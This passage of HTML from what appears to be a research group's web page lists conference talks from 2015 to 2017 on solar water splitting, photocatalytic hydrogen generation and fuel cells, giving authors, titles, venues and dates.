<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the Design, Performance & Stability of Advanced Heteronanostuctures for Solar
Water Splitting</strong>”, 9<sup>th</sup> International Conference on Materials for
Advanced
Technology (ICMAT), Symposium F on Advanced Inorganic Materials and Thin Film Technology for
Solar
Energy Harvesting, Suntec, Singapore, June 2017
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Engineering
Surface Structures and Energetics of α-Fe<sub>2</sub>O<sub>3</sub> and p-Si for Efficient Solar
Water Splitting, Processes at the Semiconductor Solution Interface 7</strong>”, 231st
Meeting
of The Electrochemical Society, New Orleans, LA, USA, May-June 2017
</li>
<li>
<strong><u>A. Hassanpour</u></strong>, <strong>L. Vayssieres</strong>, P. Bianucci,
“<strong>Optical
and Structural Properties of Arrays of Mn-doped ZnO Nanorods Prepared by a Low Temperature
Hydrothermal Method</strong>”, 2017 CAP-Canadian Association of Physicists Congress,
Kingston,
ON, Canada, May-June 2017
</li>
<li>
<strong>L.Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>On the design of advanced materials for efficient and cost-effective solar
(sea)water
splitting</strong>”, 2017 Emerging Technologies Conference, Warsaw, Poland, May 2017
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the Effects of Design, Interfacial Electronic Structure & Dimensions on the
Performance & Stability of Photoelectrodes for Solar Water Splitting</strong>”,
12<sup>th</sup> Pacific Rim Conference on Ceramic and Glass Technology including Glass & Optical
Materials Division Meeting (PacRim12), Symposium 10 on Multifunctional Nanomaterials and Their
Heterostructures for Energy and Sensing Devices, Kona, HI, USA, May 2017
</li>
<li>
<u>M. Chowdhury</u>, <strong>X.J. Guan</strong>, A. Pant, X.H. Kong, M. G. Kibria, H. Guo, F.
Himpsel, <strong>L. Vayssieres</strong>, Z. Mi, “<strong>High Efficiency and Highly Stable
Photocatalytic Overall Water Splitting on III-Nitride Nanowire Arrays</strong>”, 2017
Spring
MRS Meeting, Phoenix, AZ, USA, April 2017
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>Dimensional, Interfacial, and Confinement Effects on the Performance and
Stability of
Low-Cost Photoelectrodes for Solar Water Splitting</strong>”, 21<sup>st</sup> Topical
Meeting
of the International Society of Electrochemistry, Szeged, Hungary, April 2017
</li>
<li>
<strong>L.Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>Confinement effects in large bandgap oxide semiconductors</strong>”,
International Conference on Energy Materials Nanotechnology (EMN-East), Siem Reap, Cambodia,
March
2017
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited talk</strong>)</span>,
“<strong>Surface and Interface Engineered Heterostructures for Solar Hydrogen
Generation</strong>”, Symposium 1- Materials for Solar Fuel Production and Applications in
Materials Challenges, Materials Challenges in Alternative and Renewable Energy 2017 (MCARE
2017),
Jeju, South Korea, February 2017
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2016 (43)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="241">
<li>
<strong><u>J.B. Huang</u></strong>, <strong>L. Wang</strong>, <strong>C. Zhu</strong>, <strong>H.
Jin</strong>, “<strong>Catalytic Gasification of Guaiacol in Supercritical Water for
Hydrogen
Production</strong>”, 8<sup>th</sup> International Symposium on Multiphase Flow, Heat &
Mass
Transfer and Energy Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong><u>H.J. Jia</u></strong>, <strong>Y.P. Yang</strong>, <strong>H.T. Liu</strong>,
<strong>L.J.
Guo*</strong>,“<strong>Systematic study on the effects of operation parameters on the
performance of open cathode PEM fuel cells</strong>”, 8<sup>th</sup> International
Symposium
on Multiphase Flow, Heat & Mass Transfer and Energy Conversion (ISMF2016), Chengdu, China,
December
2016
</li>
<li>
<strong><u>J. Hu</u></strong>, X.Q. Wang, H.H. Yang, <strong>L.J. Guo*</strong>, “<strong>Strong
pH Dependence of Hydrogen Production with Glucose in Rhodobacter sphaeroides</strong>”,
8<sup>th</sup>
International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy Conversion
(ISMF2016),
Chengdu, China, December 2016
</li>
<li>
<strong><u>S.Y. Ye</u></strong>, <strong>L.J. Guo*</strong>, <strong>Q. Xu</strong>, <strong>Y.S.
Chen</strong>, <strong>Q.Y. Chen</strong>, “<strong>Investigation on Pressure Wave Induced
by
Supersonic Steam Jet Condensation in Water Flow in a Vertical Pipe</strong>”,
8<sup>th</sup>
International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy Conversion
(ISMF2016),
Chengdu, China, December 2016
</li>
<li>
<strong><u>R.Y. Wang</u></strong>, <strong>H. Jin</strong>, <strong>L.J. Guo*</strong>,
“<strong>Thermodynamic analysis of supercritical water gasification and dechlorination of
o-chlorophenol</strong>”, 8<sup>th</sup> International Symposium on Multiphase Flow, Heat
&
Mass Transfer and Energy Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong><u>W. Zhou</u></strong>, <strong>L.Y. He</strong>, <strong>S.H. Shen*</strong>,
“<strong>n-WO<sub>3</sub>/p-Si junctional photocathodes for efficient solar hydrogen
generation</strong>”, 8<sup>th</sup> International Symposium on Multiphase Flow, Heat &
Mass
Transfer and Energy Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong><u>W.L. Fu</u></strong>, <strong>M.C. Liu</strong>, <strong>F. Xue</strong>, <strong>L.J.
Guo*</strong>, “<strong>Manipulating the Heterostructures of a Visible-Light-Driven
Composite
Photocatalyst by Controlling the Mass Transportation during Synthesis</strong>”,
8<sup>th</sup> International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy
Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong>S.H. Shen</strong>, “<strong>Noble-metal Free Artificial Photosynthesis Systems
for
Solar Hydrogen Generation</strong>”, 8<sup>th</sup> International Symposium on Multiphase
Flow, Heat & Mass Transfer and Energy Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong><u>J.F. Geng</u></strong>, <strong>Y.C. Wang</strong>, <strong>X.W. Hu</strong>,
<strong>D.W.
Jing*</strong>, “<strong>Experimental and Theoretical Analysis of Particle Transient
Transport
Phenomenon in Flowing Suspension</strong>”, 8<sup>th</sup> International Symposium on
Multiphase Flow, Heat & Mass Transfer and Energy Conversion (ISMF2016), Chengdu, China, December
2016
</li>
<li>
<strong><u>H. Jin</u></strong>, <strong>L.J. Guo</strong>, <strong>Z.Q. Wu</strong>, <strong>X.
Zhang</strong>, <strong>J. Chen</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Novel ABO<sub>3</sub>-based Materials: Tailored Components and Structures towards
Photocatalytic H<sub>2</sub> Evolution under Visible-light Irradiation</strong>”,
8<sup>th</sup> International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy
Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong>J.W. Shi</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Novel
ABO<sub>3</sub>-based Materials: Tailored Components and Structures towards Photocatalytic
H<sub>2</sub> Evolution under Visible-light Irradiation</strong>”, 8<sup>th</sup>
International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy Conversion
(ISMF2016),
Chengdu, China, December 2016
</li>
<li>
<strong>M.C. Liu</strong> <span
class="invited">(<strong>Keynote & Session chair</strong>)</span>, “<strong>Controlling
Mass Transportation in Synthesizing Photocatalytic Nanocrystals for Solar H<sub>2</sub>
Production</strong>”, 8<sup>th</sup> International Symposium on Multiphase Flow, Heat &
Mass
Transfer and Energy Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong>M. Fronzi</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Nano
cluster modified TiO<sub>2</sub> anatase and rutile surfaces for photo-catalytic
processes</strong>”,
8<sup>th</sup> International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy
Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>Low Cost HeteroNanostructures for Solar Hydrogen Generation</strong>”,
8<sup>th</sup> International Symposium on Multiphase Flow, Heat & Mass Transfer and Energy
Conversion (ISMF2016), Chengdu, China, December 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Low Cost HeteroNanostructures for Solar Water Splitting</strong>”,
2<sup>nd</sup> Mexico-China Workshop on Nano: Materials / Science / Technology (NANOMXCN-2016),
Hong
Kong, China, December 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Latest advances in low cost semiconductor heteronanostructures for water
splitting</strong>”, 72<sup>nd</sup> American Chemical Society (ACS) Southwest Regional
Meeting, Symposium on Applications of Photonics in Energy and the Life Sciences, Galveston, TX,
USA,
November 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Plenary</strong>)</span>,
“<strong>Low-cost HeteroNanostructures for Solar Water Splitting</strong>”,
3<sup>rd </sup>International Workshop on Advanced Materials and Nanotechnology, Hanoi, Vietnam,
November 2016
</li>
<li>
<strong><u>F.J. Niu</u></strong>, <strong>Y. Yu</strong>, <strong>S.H. Shen*</strong>, <strong>L.J.
Guo</strong>, “<strong>A Novel Hybrid Artificial Photosynthesis System with
MoS<sub>2</sub>
Embedded Carbon Nanofibers as Electron Relay and Hydrogen Evolution Catalyst</strong>”,
17<sup>th </sup>IUMRS International Conference in Asia (IUMRS-ICA2016), Qingdao, China, October
2016
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Latest development in design strategies for efficient solar water splitting
photoelectrodes</strong>”, 230<sup>th</sup> Electrochemical Society Meeting, Symposium
Photocatalysts, Photoelectrochemical Cells, and Solar Fuels 7, PRiME 2016, Honolulu, HI, USA,
October 2016
</li>
<li>
<strong><u>R. Song</u></strong>, <strong>B. Luo</strong>, <strong>D.W. Jing</strong>,
“<strong>Efficient Photothermal Catalytic Hydrogen Production over Nonplasmonic Pt Metal
Supported on TiO<sub>2</sub></strong>”, Solar Hydrogen and Nanotechnology XI, SPIE Optics
and
Photonics, San Diego, USA, August 2016
</li>
<li>
<strong><u>Y. Liu</u></strong><span class="invited"></span>, Y.H. Guo, J. Ager, <strong>M.T.
Li</strong>, “<STRONG>Fabrication of CoOx Layer on Porous BiVO<sub>4</sub> Film for Water
Splitting</STRONG>”, Solar Hydrogen and Nanotechnology XI, SPIE Optics and Photonics, San
Diego, USA, August 2016
</li>
<li>
<strong><u>Y. Liu</u></strong><span class="invited"></span>, <strong>S.H. Shen</strong> <span
class="invited">(<strong>Invited</strong>)</span>, “<strong>Heterostructures for
Photoelectrochemical and Photocatalytic Hydrogen Generation</strong>”, Solar Hydrogen and
Nanotechnology XI, SPIE Optics and Photonics, San Diego, USA, August 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the design of new low cost photocatalysts for efficient solar water
oxidation</strong>”, 252<sup>nd</sup> ACS National Meeting, Symposium on Solar Fuels:
Power to
the People, Philadelphia, PA, August 2016
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Heterostructures
for Solar Hydrogen Generation</strong>”, 3<sup>rd</sup> International Conference on
Electrochemical Energy Science and Technology (EEST2016), Kunming, China, August 2016
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On confinement, </strong><strong>surface </strong><strong>& dimensionality
effects in oxide semiconductors for solar water oxidation</strong>”, XXV International
Materials Research Congress, Symposium on Advances on Solar Fuels/Artificial Photosynthesis:
Materials and Devices, Cancun, Mexico, August 2016
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Low cost advanced materials design strategies for efficient solar energy
conversion</strong>”, XXV International Materials Research Congress, Symposium on
Materials
and Technologies for Energy Conversion, Saving and Storage (MATECSS), Cancun, Mexico, August
2016
</li>
<li>
<strong><u>D.M. Zhao</u></strong>, <strong>S.H. Shen*</strong>, <strong>L.J. Guo</strong>,
“<strong>ITO Electronic Pump Boosting Photocatalytic Hydrogen Evolution over Graphitic
Carbon
Nitride</strong>”, 2<sup>nd</sup> International Conference on Nanoenergy and Nanosystems
2016
(NENS2016), Beijing, China, July 2016
</li>
<li>
<strong>S.H. Shen </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Engineering
One-Dimensional Hematite Photoanodes for Solar Water Splitting</strong>”, 2<sup>nd</sup>
International Conference on Nanoenergy and Nanosystems 2016 (NENS2016), Beijing, China, July
2016
</li>
<li>
<strong>M.T. Li</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<span
lang="EN-GB"><strong>Photo/Electrocatalysis: Mechanistic Insight and Catalyst Design from Density Functional Theory</strong></span>”,
Global Forum on Advanced Materials and Technologies for Sustainable Development, Symposium G2 on
Functional Nanomaterials for Sustainable Energy Technologies, Toronto, Canada, June 2016
</li>
<li>
<strong><u>X.J. Guan</u></strong>, F. Chowdhury, <strong>L. Vayssieres</strong>, <strong>L.J.
Guo</strong>, Z. Mi, “<strong>Photocatalytic Seawater Splitting on Metal Nitride
Nanowires</strong>”, Global Forum on Advanced Materials and Technologies for Sustainable
Development, Symposium G2 on Functional Nanomaterials for Sustainable Energy Technologies,
Toronto,
Canada, June 2016
</li>
<li>
<strong><u>Y.B. Chen</u></strong> <span
class="invited">(<strong>Invited</strong>)</span>,<strong>
Z.X. Qin</strong>, <strong>X.J. Guan</strong>, <strong>M.C. Liu</strong>, “<strong>One-pot
Synthesis of Heterostructured Photocatalysts for Improved Solar-to-Hydrogen Conversion</strong>”,
Global Forum on Advanced Materials and Technologies for Sustainable Development, Symposium G2 on
Functional Nanomaterials for Sustainable Energy Technologies, Toronto, Canada, June 2016
</li>
<li>
<strong><u>M.C. Liu</u></strong>, <strong>X.X. Wang</strong>, <strong>L.
Zhao</strong>,“<strong>Shape-Controlled Metal/Semiconductor Nanocrystals in a
Well-Controlled
Kinetic Process and Their Application for Electrocatalysis or Photocatalysis</strong>”,
Global
Forum on Advanced Materials and Technologies for Sustainable Development, Symposium G2 on
Functional
Nanomaterials for Sustainable Energy Technologies, Toronto, Canada, June 2016
</li>
<li>
<strong>M.C. Liu</strong>, “<strong>Crystal-facets Dependent Solar Hydrogen Generation
from
Kinetic Growth Controlled Nanoparticles</strong>”, 2<sup>nd</sup> International Symposium
on
Energy Conversion and Storage, Xiamen, China, June 2016
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<span
lang="EN-GB"><strong>New Design Strategy for Advanced Photocatalysts</strong></span>”,
Global Forum on Advanced Materials and Technologies for Sustainable Development, Symposium G2 on
Functional Nanomaterials for Sustainable Energy Technologies, Toronto, Canada, June 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>On the design of advanced photocatalysts for solar water splitting</strong>”,
Emerging Technologies 2016 Conference, Session on Optoelectronics & Photonics, Montreal, QC,
Canada, May 2016
</li>
<li>
<strong>S.H. Shen</strong>
<span class="invited">(<strong>Invited</strong>)</span>, “<strong>1D metal oxides for
solar
water splitting</strong>”, Workshop on Advanced Energy Materials & X-ray Spectroscopy,
Tamkang University, Taipei, May 2016
</li>
<li>
<strong>L. Vayssieres</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Interfacial and confinement effects in oxide semiconductors</strong>”,
Workshop
on Advanced Energy Materials & X-ray Spectroscopy, Tamkang University, Taipei, May 2016
</li>
<li>
<strong>L.J. Guo</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Solar
hydrogen: Harvesting light and heat from Sun</strong>”, Workshop on Advanced Energy
Materials
& X-ray Spectroscopy, Tamkang University, Taipei, May 2016
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Morphological, dimensional, and interfacial effects on oxide semiconductor
efficiency
for solar water splitting</strong>”, American Ceramic Society Materials Challenges in
Alternative & Renewable Energy 2016 Conference, Clearwater, FL, April 2016
</li>
<li>
<strong>L.Vayssieres</strong> <span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong>Latest Advances in Solar Water Splitting</strong>”, 2016 Spring MRS
Meeting,
Symposium EE2: Advancements in Solar Fuels Generation: Materials, Devices and Systems, Phoenix,
AZ,
March 2016
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>,
“<strong><span
lang="EN-GB">Latest Advances in Low Cost Solar Water Splitting</span></strong>”,
2<sup>nd</sup> Fusion Conference on Molecules and Materials for Artificial Photosynthesis,
Cancun,
Mexico, February 2016
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Nanodesigned
Materials for Photoelectrochemical and Photocatalytic Solar Hydrogen Generation</strong>”,
2<sup>nd</sup> Fusion Conference on Molecules and Materials for Artificial Photosynthesis
Conference, Cancun, Mexico, February 2016
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>One-dimensional
Metal Oxides for Solar Water Splitting</strong>”, The 6<sup>th</sup> China-Australia Joint
Symposium on Energy and Biomedical Materials, Suzhou, China, January 2016
</li>
</ol>
<h5 align="center" class="h5" style="margin-top:15px; margin-bottom:0px;">2015 (50)</h5>
<ol style="list-style-type:decimal; margin: 30px; padding:30px 10px;" reversed start="198">
<li>
<strong><u>B. Wang</u></strong>, <strong>S.H. Shen*</strong>, <strong>L.J. Guo*</strong>,
“<strong>Hydrogenation
of {023} and {001} Facets Enclosed SrTIO<sub>3</sub> Single Crystals for Photocatalytic Hydrogen
Evolution</strong>”, 5<sup>th</sup> Asia-Pacific Forum on Renewable Energy, HF: Hydrogen &
Fuel
Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>X.X. Wang</u></strong>, <strong>M.C. Liu</strong>, <strong>Z.H. Zhou</strong>,
<strong>L.J.
Guo*</strong>, “<strong>Crystal-Facets Dependent Solar Hydrogen Generation from Kinetic
Growth
Controlled CdS Nanoparticles</strong>”, 5<sup>th</sup> Asia-Pacific Forum on Renewable Energy,
HF:
Hydrogen & Fuel Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>J. Wang</u></strong>, <strong>J.Z. Su</strong>, <strong>L. Vayssieres*</strong>,
<strong>L.J.
Guo*</strong>, “<strong>Controlled Synthesis of Porous Hematite Nanoplate Arrays for Solar
Water
Splitting: Towards Efficient Electron-Hole Separation</strong>”, 5<sup>th</sup> Asia-Pacific
Forum
on Renewable Energy, HF: Hydrogen & Fuel Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>X.K. Wan</u></strong>, <strong>F.J. Niu</strong>, <strong>J.Z. Su</strong>, <strong>L.J.
Guo*</strong>, “<strong>Reduced Graphene Oxide Modification and Tungsten Doping for Enhanced
Photoelectrochemical Water Oxidation of Bismuth Vanadate</strong>”, 5<sup>th</sup> Asia-Pacific
Forum on Renewable Energy, HF: Hydrogen & Fuel Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>G.Y. Chen</u></strong>, <strong>L.J. Guo*</strong>, <strong>H.T. Liu*</strong>,
“<strong>The
Relationship Between the Double Layer Capacitance and Water Content in the Cathode Catalyst
Layer</strong>”, 5<sup>th</sup> Asia-Pacific Forum on Renewable Energy, HF: Hydrogen & Fuel
Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>X.Q. Wang</u></strong>, <strong>H.H. Yang*</strong>,<strong> Y. Zhang</strong>, <strong>L.J. Guo*</strong>,
“<strong>Isolation enhanced hydrogen production of CBB deactivation Rhodobacter sphaeroides
mutant
by using transposon mutagenesis in the present of NH<sub>4</sub><sup>+</sup></strong>”,
5<sup>th</sup> Asia-Pacific Forum on Renewable Energy, HF: Hydrogen & Fuel Cell, Jeju,
Korea,
November 2015
</li>
<li>
<strong><u>Y. Zhang</u></strong>, <strong>H.H. Yang</strong>, <strong>J.L. Feng</strong>,
<strong>L.J. Guo*</strong>,
“<strong>Overexpression of F0 operon and F1 operon of ATPase in Rhodobacter sphaeroides
enhanced its photo-fermentative hydrogen production</strong>”, 5<sup>th</sup> Asia-Pacific
Forum on Renewable Energy, HF: Hydrogen & Fuel Cell, Jeju, Korea, November 2015
</li>
<li>
<strong><u>Y. Zhang</u></strong>, J. Hu, <strong>H.H. Yang</strong>,
<strong>L.J. Guo*</strong>,
“<strong>Bio-hydrogen production by co-culture of Enterobacter cloacae YA012 and
Rhodobacter
sphaeroides HY01</strong>”, 5<sup>th</sup> Asia-Pacific Forum on Renewable Energy, HF:
Hydrogen & Fuel Cell, Jeju, Korea, November 2015
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>One
Dimensional Metal Oxides for Solar Water Splitting</strong>”, 3<sup>rd</sup> International
Workshop on Nanotechnology, Renewable Energy & Sustainability, Xi'an, P. R. China,
September,
2015
</li>
<li>
<strong>M.C. Liu</strong>, “<strong>Facet-engineered chalcogenide photocatalyst for enhanced
solar
hydrogen production: charge separation and surface activation</strong>”, 14<sup>th</sup>
International Conference on Clean Energy (ICCE 2015), Saskatoon, Canada, September 2015
</li>
<li>
<strong><u>X.J. Guan</u></strong>, <strong>L.J. Guo</strong>, “<strong>Facet engineered bismuth
vanadate for highly efficient photocatalytic water oxidation</strong>”, 14<sup>th</sup>
International Conference on Clean Energy (ICCE 2015), Saskatoon, Canada, September 2015
</li>
<li>
<strong><u>Y.P. Yang</u></strong>, <strong>H.T. Liu*</strong>,<strong> L.J. Guo*</strong>,
“<strong>Optimization of operating conditions in PEM fuel cells with dead-ended
anode</strong>”,
14<sup>th</sup> International Conference on Clean Energy (ICCE 2015), Saskatoon, Canada,
September
2015
</li>
<li>
<strong><u>X.Q. Wang</u></strong>,
<strong>H.H. Yang*</strong>, <strong>L.J.</strong> <strong>Guo*</strong>,
“<strong>Enhancement of hydrogen production performance by the double mutant from cbbR knochout
strain via transposon mutagenensis</strong>”, 14<sup>th</sup> International Conference on Clean
Energy (ICCE 2015), Saskatoon, Canada, September 2015
</li>
<li>
<strong><u>X. Zhang</u></strong>, <strong>L.J. Guo*</strong>, <strong>H.T.
Liu</strong><strong>*</strong>,
“<strong>Mass transport degradation caused by carbon corrosion in proton exchange membrane fuel
cells</strong>”, 14<sup>th</sup> International Conference on Clean Energy (ICCE 2015),
Saskatoon,
Canada, September 2015
</li>
<li style="padding-top:0px;">
<strong>L. Vayssieres </strong><span class="invited">(<strong>Keynote</strong>)</span>,
“<strong>Advanced metal oxide arrays by aqueous chemical
growth</strong>”, EUROMAT-<span
name="European Congress and Exhibition on Advanced Materials and Processes registration">European Congress and Exhibition on Advanced Materials and Processes</span>,
Symposium C3.2: Assembly-Mediated and Surface-Based Coatings, Warsaw, Poland, September 2015
</li>
<li>
<STRONG>L. Vayssieres </STRONG><span class="invited">(<STRONG>Invited</STRONG>)</span>,
“<STRONG>Interfacial, Dimensionality, and Confinement effects in Oxide
Semiconductors</STRONG>”,
International Exploratory Workshop on Photoelectrochemistry, Catalysis and X-ray
Spectroscopy, EMPA
- Swiss Federal Laboratories for Materials Science & Technology, Dubendorf, Switzerland,
August
2015
</li>
<li>
<STRONG>L. Vayssieres </STRONG><span class="invited">(<strong>Invited</strong>)</span>,
“<STRONG></STRONG><STRONG>Latest advances in low-cost solar water splitting
nanodevices</STRONG><STRONG></STRONG>”, SPIE Optics & Photonics Nanoscience
Engineering,
Symposium on Low-Dimensional Materials and Devices, San Diego, CA, August 2015
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Keynote & Session Chairs</strong>)</span>,
“<strong>On the surface, confinement and dimensionality effects of large bandgap oxide
semiconductors</strong>”, SPIE Optics & Photonics, Symposium on Solar Hydrogen &
Nanotechnology X, San Diego, CA, August 2015
</li>
<li>
<strong>L.J. Guo </strong><span class="invited">(<strong>Keynote</strong></strong>)</span>,
<strong><u>S.H.
Shen</u></strong>, “<strong>Low-cost and high-efficiency solar hydrogen conversion: On
materials
design and pilot-scale demonstration</strong>”, SPIE Optics & Photonics, Symposium on Solar
Hydrogen & Nanotechnology X, San Diego, CA, August 2015
</li>
<li>
<strong>L.J. Guo</strong> <span class="invited">(<STRONG>Plenary</STRONG>)</span>, <strong><u>D.W.
Jing</u></strong>, “<strong>Solar hydrogen: harvesting light and heat from sun</strong>”, SPIE
Optics & Photonics, Symposium on Solar Hydrogen & Nanotechnology X, San Diego, CA,
August
2015
</li>
<li>
<strong>D.W. Jing </strong><span class="invited">(</span><span
class="invited"><strong>Invited</strong></span><span class="invited">)</span>, “<strong>Experimental
and numerical study on an annular fluidized-bed photocatalytic reactor</strong>”, SPIE Optics
&
Photonics, Symposium on Solar Hydrogen & Nanotechnology X, San Diego, CA, August 2015
</li>
<li>
X.J. Feng <strong> </strong><span class="invited">(</span><span
class="invited"><strong>Invited</strong></span><span class="invited">)</span>, <strong><u>J.Z.
Su</u></strong>, “<strong>Synthesis and assembly of 1D inorganic semiconductor for solar energy
conversion</strong>”, SPIE Optics & Photonics, Symposium on Solar Hydrogen &
Nanotechnology
X, San Diego, CA, August 2015
</li>
<li>
<u>F.J. Himpsel</u> <span class="invited">(<strong>Keynote</strong>)</span>, W.L. Yang, D.
Prendergast, C.X. Kronawitter, Z. Mi, <strong>L. Vayssieres</strong>, “<strong>Synchrotron-based
spectroscopy for solar energy conversion</strong>”, SPIE Optics & Photonics, Symposium
on
Solar Hydrogen & Nanotechnology X, San Diego, CA, August 2015
</li>
<li>
<strong>J.Z. Su</strong>, “<strong>High aspect ratio WO<sub>3</sub> nanorod arrays based
WO<sub>3</sub>/BiVO<sub>4</sub> Heterojunction for photoelectrochemical water splitting</strong>”,
SPIE Optics & Photonics, Symposium on Solar Hydrogen & Nanotechnology X, San Diego, CA,
August 2015
</li>
<li>
<strong><u>Y.B. Chen</u></strong>, <strong>Z.X. Qin</strong>, <strong>L.J. Guo</strong>,
“<strong>Electrophoretic
deposition of composition-tunable (Cu<sub>2</sub>Sn)xZn<sub>3(1-x)</sub>S<sub>3</sub>
nanocrystal
films as efficient photocathodes for photoelectrochemical water splitting</strong>”, SPIE Optics
& Photonics, Symposium on Solar Hydrogen & Nanotechnology X, San Diego, CA, August 2015
</li>
<li>
<U><strong>J.W. Shi</strong></u>, <strong>Y.Z. Zhang</strong>, <strong>L.J. Guo</strong>,
“<strong>NH<sub>3</sub>-treated
MoS<sub>2</sub> nanosheets for enhanced H<sub>2</sub> evolution under visible-light
irradiation</strong>”, SPIE Optics & Photonics, Symposium on Solar Hydrogen &
Nanotechnology
X, San Diego, CA, August 2015
</li>
<li>
<strong><u>L.J. Ma</u></strong>, <strong>L.J. Guo</strong>, “<strong>Photocatalytic hydrogen
production over CdS: Effects of reaction atmosphere studied by in situ Raman
spectroscopy</strong>”,
SPIE Optics & Photonics, Symposium on Solar Hydrogen & Nanotechnology X, San Diego, CA,
August 2015
</li>
<li>
<strong>S.H. Shen</strong> <span class="invited">(<strong>Invited</strong>)</span>, “<strong>Doping
and Surface Engineering to Metal Oxide Nanorods for Photoelectrochemical Water
Splitting</strong>”,
5<sup>th</sup> Young Scholars Symposium on Nano & New Energy Technology, Suzhou, China, August
2015
</li>
<li>
<strong><u>J.W. Shi</u> </strong><span class="invited">(</span><span
class="invited"><strong>Invited</strong></span><span class="invited">)</span>, <strong>Y.Z.
Zhang</strong>, <strong>L.J. Guo</strong>, “<strong>Molybdenum sulfide nanosheets: ammonia
post-treatment towards improved visible-light-driven hydrogen production</strong>”, Mexico-China
workshop on Nanomaterials, Nanoscience and Nanotechnology: Renewable energy and water
remediation,
XXIV International Materials Research Congress, Cancun, Mexico, August 2015
</li>
<li>
<strong>J.Z. Su</strong> <span class="invited">(<strong>Invited</strong>)</span>,
“<strong>WO<sub>3</sub>/BIVO<sub>4</sub> Nanowire Heterojunction for Photoelectrochemical Water
Oxidation</strong>”, Mexico-China workshop on Nanomaterials, Nanoscience and Nanotechnology:
Renewable energy and water remediation, XXIV International Materials Research Congress, Cancun,
Mexico, August 2015
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>, “<strong>Quantum-confined
oxide arrays from aqueous solutions</strong>”, 8<sup>th</sup> International Conference on
Materials for Advanced Technology (ICMAT), Symposium R on Novel solution processes for advanced
functional materials, Suntec, Singapore, June-July 2015
</li>
<li>
<strong>L. Vayssieres </strong><span
class="invited">(<strong>Invited talk & Session chair</strong>)</span>, “<strong>Aqueous
chemical growth of visible light-active oxide semiconductors</strong>”, 98<sup>th</sup>
Canadian Chemistry Conference & Exhibition, Division of Materials Chemistry, Symposium on
Nanostructured Materials for Solar Energy Conversion and Storage, Ottawa, Canada, June 2015
</li>
<li>
<strong>L. Vayssieres </strong><span class="invited">(<strong>Invited</strong>)</span>,
“<strong>Low Cost Nanodevices for Solar Water Splitting</strong>”, CMOS Emerging
Technologies Research Conference, Vancouver, BC, Canada, May 2015
</li>
<li>
<STRONG>J.J. Wei </STRONG><span class="invited">(<STRONG>Invited</STRONG>)</span>,
“<STRONG>Study
of concentrating solar photovoltaic-thermal hybrid system</STRONG>”, 8<sup>th</sup> International
